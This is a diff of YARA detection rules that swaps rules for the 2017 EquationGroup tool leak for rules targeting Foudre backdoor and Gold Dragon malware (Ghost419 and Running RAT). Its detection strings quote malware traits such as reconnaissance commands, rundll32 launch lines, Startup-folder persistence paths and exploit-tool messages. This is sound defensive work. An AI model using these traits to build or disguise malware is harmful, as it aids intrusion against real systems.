-		$s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii
+		$s1 = "r @$ip=@$t0" ascii
+		$s2 = ";eb @$t0+" ascii
+		$s3 = ".foreach /pS" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgkd_Msslu64_Msgki_Mssld : FILE
+rule SIGNATURE_BASE_Foudre_Backdoor_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Foudre Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb6d4098-8ede-58ba-9851-7c8b360fb606"
-		date = "2017-04-15"
+		id = "ab2d43f4-fc35-5980-9b5d-98c5c4cfd012"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3231-L3256"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f61ce58356ffca197d4a2a4aae43414bcb8f2f284dbee818124dd450f4b50cb9"
+		logic_hash = "e42959162017ddf6da1d0b2950096e93e0e98c3e5f88ae28fc48e82ef98ca87b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
-		hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
-		hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
-		hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e"
-		hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46"
+		hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
+		hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
 
 	strings:
-		$s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii
-		$s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii
-		$s3 = "iijymqp" fullword ascii
-		$s4 = "AWAVAUATASARAQI" fullword ascii
-		$s5 = "WARASATAUAVM" fullword ascii
-		$op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc }
-		$op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 }
-		$op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 }
+		$s1 = "initialization failed: Reinstall the program" fullword wide
+		$s2 = "SnailDriver V1" fullword wide
+		$s3 = "lp.ini" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of ( $s* ) or all of ( $op* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallback : FILE
+rule SIGNATURE_BASE_Foudre_Backdoor_Dropper_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Foudre Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3258-L3272"
+		id = "38c7d05b-d545-53c5-8db7-a7925b5b7838"
+		date = "2017-08-01"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "63a17dd56874085753cae92f70d6248ceaac6eaea99fda0d3a551e4988a73895"
+		logic_hash = "77ae856e74ceb04e73c26154d7b4cf98ed0e1d8b9ac6ed78775becbff2473e13"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
+		hash1 = "6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac"
+		hash2 = "da228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5"
 
 	strings:
-		$s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii
-		$s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii
+		$x1 = "536F594A96C5496CB3949A4DA4775B576E049C57696E646F77735C43757272656E7456657273696F6E5C5C52756E" fullword wide
+		$x2 = "2220263024C380B3278695851482EC32" fullword wide
+		$s1 = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\\\Startup\\" wide
+		$s2 = "C:\\Documents and Settings\\All Users\\" wide
+		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\\Shell Folders" wide
+		$s4 = "ShellExecuteW" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Doublefeaturereader_Doublefeaturereader_0 : FILE
-{
-	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f662c961-80be-5453-86b1-c4d40ac5b732"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3274-L3293"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9049e1fe31917ecc27e57afecd5845afcd966aac83d386b7c0995c1e3378a0d0"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927"
-		hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae"
-
-	strings:
-		$x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii
-		$x2 = "Double Feature Target Version" fullword ascii
-		$x3 = "DoubleFeature Process ID" fullword ascii
-		$op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 }
 
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them )
-}
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Vtuner_Vtuner_1 : FILE
+rule SIGNATURE_BASE_Foudre_Backdoor_Component_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Foudre Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3794f30b-39dc-59eb-9fd3-4c7837bfd47d"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3295-L3315"
+		id = "9070f581-64a7-5620-aff4-7f2cbd73099d"
+		date = "2017-08-01"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L53-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c161b36599b11264c31c54b94d6bdba53b3f13d27861ededc9f03bba394b775"
+		logic_hash = "2eb267ab93c297101aef0cfcca78d0299ca7baa96b983a5f2ff547394cbac82d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
-		hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
+		hash1 = "7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4"
+		hash2 = "db605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109"
 
 	strings:
-		$s1 = "Unable to get -w hash.  %x" fullword wide
-		$s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide
-		$s4 = "Unable to set -w provider. %x" fullword wide
-		$op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 }
-		$op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 }
+		$s1 = { 50 72 6F 6A 65 63 74 31 2E 64 6C 6C 00 44 31 }
+		$s2 = "winmgmts:\\\\localhost\\root\\SecurityCenter2" fullword wide
+		$s3 = "C:\\Documents and Settings\\All Users\\" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 3 of them ) or ( 2 of them and pe.exports ( "D1" ) ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Ecwi_ESKE_EVFR_RPC2_2 : FILE
+rule SIGNATURE_BASE_Foudre_Backdoor_SFX : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Foudre Backdoor SFX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c653b0a-fda4-51d6-bf90-bd637547fe47"
-		date = "2017-04-15"
+		id = "b5c7cd6b-48c8-5703-b695-19d226de1810"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3317-L3336"
+		reference = "https://goo.gl/Nbqbt6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_foudre.yar#L77-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73522034c6588fee090eff87602568371562bdbcbe781ee6e152f3b854514690"
+		logic_hash = "dd5492f5314cb87fdb7c8b29bdf31e1fcd8541ed47b20f309538437d9c6ac600"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
+		hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
 
 	strings:
-		$s1 = "Target is share name" fullword ascii
-		$s2 = "Could not make UdpNetbios header -- bailing" fullword ascii
-		$s3 = "Request non-NT session key" fullword ascii
+		$s1 = "main.exe" fullword ascii
+		$s2 = "pub.key" fullword ascii
+		$s3 = "WinRAR self-extracting archive" fullword wide
 
 	condition:
 		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__EAFU_Ecwi_ESKE_EVFR_RPC2_4 : FILE
-{
-	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9dc9ed95-5233-56e1-b8f1-4f27f43e7e43"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3338-L3361"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed6e0e4e5a0849aad64bbc47c047f3fe388052d0ebe89de0257d4422fb39be21"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
-		hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
-		hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
-	strings:
-		$x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii
-		$s1 = "WsaErrorTooManyProcesses" fullword ascii
-		$s2 = "NtErrorMoreProcessingRequired" fullword ascii
-		$s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii
-		$s4 = "ServerErrorBadNamePassword" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of ( $s* ) or 1 of ( $x* ) )
-}
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Sendcftrigger_Sendpktrigger_6 : FILE
+rule SIGNATURE_BASE_Golddragon_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects malware from Gold Dragon report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "658d6f7d-2164-5e43-b5a5-d9bea9cd2e27"
-		date = "2017-04-15"
+		id = "1da29f0f-4e83-56a0-b843-3b19d9b9a1b7"
+		date = "2018-02-03"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3363-L3379"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fb290bdf15e0701b6d543e1f978011046abe23e58c790ee1b992a5e0443a271"
-		score = 75
+		logic_hash = "873cf7aa18027615fe8c44140879811254229a238f7d426144fb7c1a6e07ea74"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
-		hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
-
-	strings:
-		$s4 = "* Failed to connect to destination - %u" fullword wide
-		$s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "168c2f7752511dfd263a83d5d08a90db" or pe.imphash ( ) == "0606858bdeb129de33a2b095d7806e74" or pe.imphash ( ) == "51d992f5b9e01533eb1356323ed1cb0f" or pe.imphash ( ) == "bb801224abd8562f9ee8fb261b75e32a" )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Addresource : FILE
+rule SIGNATURE_BASE_Golddragon_Aux_File : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects export from Gold Dragon - February 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cbba38fa-a906-5463-ae46-2b9c9f1bf8e0"
-		date = "2017-04-15"
+		id = "8f23dec4-e369-500f-a036-32df13e5543e"
+		date = "2018-02-03"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3381-L3398"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L31-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e59863ac7f1147cdbc34cbd2b09183487999d9f01974279c7ccc0c5af7a99976"
-		score = 75
+		logic_hash = "4c5eb04cdafe3a69e584c64b833d8c6d21890660e92cc050bb29798dbcdf5326"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
-		hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
 
 	strings:
-		$s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii
-		$s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii
-		$s3 = "Unable to get path for target binary." fullword ascii
+		$x1 = "/////////////////////regkeyenum////////////" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ESKE_RPC2_8 : FILE
+
+rule SIGNATURE_BASE_Golddragon_Ghost419_RAT : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Ghost419 RAT from Gold Dragon report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "694a1afc-7fea-58ac-b736-44957bbc0334"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3400-L3416"
+		id = "8ac951d5-4a18-50c5-8ded-8a0a6b585fd6"
+		date = "2018-02-03"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L46-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fa706fb7f138d679421fe6c5b29d6bf93893adc8bffe9dffaafa728c1b2d1d5"
+		logic_hash = "b953c5e21c332add4ff3b8fef9d623904eb929b0e7fc86e6c7109cd81bc3819b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "45bfa1327c2c0118c152c7192ada429c6d4ae03b8164ebe36ab5ba9a84f5d7aa"
+		hash2 = "ee7a9a7589cbbcac8b6bf1a3d9c5d1c1ada98e68ac2f43ff93f768661b7e4a85"
+		hash3 = "dee482e5f461a8e531a6a7ea4728535aafdc4941a8939bc3c55f6cb28c46ad3d"
+		hash4 = "2df9e274ce0e71964aca4183cec01fb63566a907981a9e7384c0d73f86578fe4"
+		hash5 = "111ab6aa14ef1f8359c59b43778b76c7be5ca72dc1372a3603cd5814bfb2850d"
+		hash6 = "0ca12b78644f7e4141083dbb850acbacbebfd3cfa17a4849db844e3f7ef1bee5"
+		hash7 = "ae1b32aac4d8a35e2c62e334b794373c7457ebfaaab5e5e8e46f3928af07cde4"
+		hash8 = "c54837d0b856205bd4ae01887aae9178f55f16e0e1a1e1ff59bd18dbc8a3dd82"
+		hash9 = "db350bb43179f2a43a1330d82f3afeb900db5ff5094c2364d0767a3e6b97c854"
 
 	strings:
-		$s4 = "Fragment: Packet too small to contain RPC header" fullword ascii
-		$s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii
+		$x2 = "WebKitFormBoundarywhpFxMBe19cSjFnG" ascii
+		$x3 = "\\Microsoft\\HNC\\" ascii
+		$x4 = "\\anternet abplorer" ascii
+		$x5 = "%s\\abxplore.exe" fullword ascii
+		$x6 = "GHOST419" fullword ascii
+		$x7 = "I,m Online. %04d - %02d - %02d - %02d - %02d" fullword ascii
+		$x8 = "//////////////////////////regkeyenum//////////////" ascii
+		$s0 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
+		$s1 = "www.GoldDragon.com" fullword ascii
+		$s2 = "/c systeminfo >> %s" fullword ascii
+		$s3 = "/c dir %s\\ >> %s" fullword ascii
+		$s4 = "DownLoading %02x, %02x, %02x" fullword ascii
+		$s5 = "Tran_dll.dll" fullword ascii
+		$s6 = "MpCmdRunkr.dll" fullword ascii
+		$s7 = "MpCmdRun.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( ( pe.exports ( "ExportFunction" ) and pe.number_of_exports == 1 ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_10 : FILE
+
+rule SIGNATURE_BASE_Golddragon_Runningrat : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Running RAT from Gold Dragon report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dfff868-cb66-51c0-a7c7-5cc872232b86"
-		date = "2017-04-15"
+		id = "7de93103-46a5-5aba-90cf-26735a6a580e"
+		date = "2018-02-03"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3441-L3458"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L88-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc30c62da7a7fd9144efef6f44c50552234f372c38c4479a024fbb0ca72530de"
+		logic_hash = "02b0ac613bb01cb5bbe947661880070790bbb7c6ba9925e70bc200df34747a0b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash1 = "0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88"
+		hash2 = "2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863"
+		hash3 = "7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51"
 
 	strings:
-		$x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii
-		$x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii
-		$s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii
+		$x1 = "C:\\USERS\\WIN7_x64\\result.log" fullword wide
+		$x2 = "rundll32.exe %s RunningRat" fullword ascii
+		$x3 = "SystemRat.dll" fullword ascii
+		$x4 = "rundll32.exe %s ExportFunction" fullword ascii
+		$x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii
+		$x6 = "ixeorat.bin" fullword ascii
+		$x7 = "C:\\USERS\\Public\\result.log" fullword ascii
+		$a1 = "emanybtsohteg" fullword ascii
+		$a2 = "tekcosesolc" fullword ascii
+		$a3 = "emankcosteg" fullword ascii
+		$a4 = "emantsohteg" fullword ascii
+		$a5 = "tpokcostes" fullword ascii
+		$a6 = "putratSASW" fullword ascii
+		$s1 = "ParentDll.dll" fullword ascii
+		$s2 = "MR - Already Existed" fullword ascii
+		$s3 = "MR First Started, Registed OK!" fullword ascii
+		$s4 = "RM-M : LoadResource OK!" fullword ascii
+		$s5 = "D:\\result.log" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "c78ccc8f02286648c4373d3bf03efc43" or pe.exports ( "RunningRat" ) or 1 of ( $x* ) or 5 of ( $a* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 : FILE
+rule SIGNATURE_BASE_Golddragon_Runnignrat : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Running RAT malware from Gold Dragon report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6848065-377b-5eda-821d-d2cc16f483cc"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3460-L3479"
+		id = "b99b89a4-a764-5d72-8360-8e53461267d9"
+		date = "2018-02-03"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/rW1yvZ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L130-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d43aa4823de248308597bd02cd27e598808b94e1ad7348ddb9e27d8a37ac426"
+		logic_hash = "5bcc2ebbd54c31cf418430149eb558e8e26355161d0b53f403e7dfd2e1707baa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
-		hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash1 = "94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579"
+		hash2 = "5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b"
+		hash3 = "98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a"
 
 	strings:
-		$x1 = "Target is vulnerable" fullword ascii
-		$x2 = "Target is NOT vulnerable" fullword ascii
+		$s1 = "cmd.exe /c systeminfo " fullword ascii
+		$s2 = "ieproxy.dll" fullword ascii
+		$s3 = "taskkill /f /im daumcleaner.exe" fullword ascii
+		$s4 = "cmd.exe /c tasklist " fullword ascii
+		$s5 = "rundll32.exe \"%s\" Run" fullword ascii
